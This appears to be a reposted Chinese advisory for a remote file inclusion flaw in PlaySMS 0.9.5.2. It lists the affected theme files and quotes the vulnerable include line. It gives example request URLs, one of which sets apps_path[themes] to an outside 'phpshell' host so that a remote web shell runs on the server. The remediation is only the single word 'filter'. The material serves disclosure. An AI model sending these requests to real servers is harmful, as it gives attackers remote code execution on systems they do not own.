PlaySMS 0.9.5.2及更新版本远程文件包含缺陷及修复

[o] PlaySMS <= Remote File Inclusion Vulnerability

软件: PlaySMS ver 0.9.5.2 程序官方: http://playsms.org/ 作者: NoGe www.2cto.com

=============================================================================================================

[o]缺陷分析

<?php include $apps_path['themes']."/".$themes_module."/header.php"; ?>

affected all this files

web/plugin/themes/default/page_forgot.php

web/plugin/themes/default/page_login.php

web/plugin/themes/default/page_noaccess.php

web/plugin/themes/default/page_register.php

web/plugin/themes/km2/page_noaccess.php

web/plugin/themes/work2/page_forgot.php

web/plugin/themes/work2/page_login.php

web/plugin/themes/work2/page_noaccess.php

web/plugin/themes/work2/page_register.php

[o] 测试

http://www.2cto.com /[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]

[o] 实例

http://www.2cto.com /[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?

=============================================================================================================

修复：过滤

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did11431

更新时间：2022-09-13 阅读：76次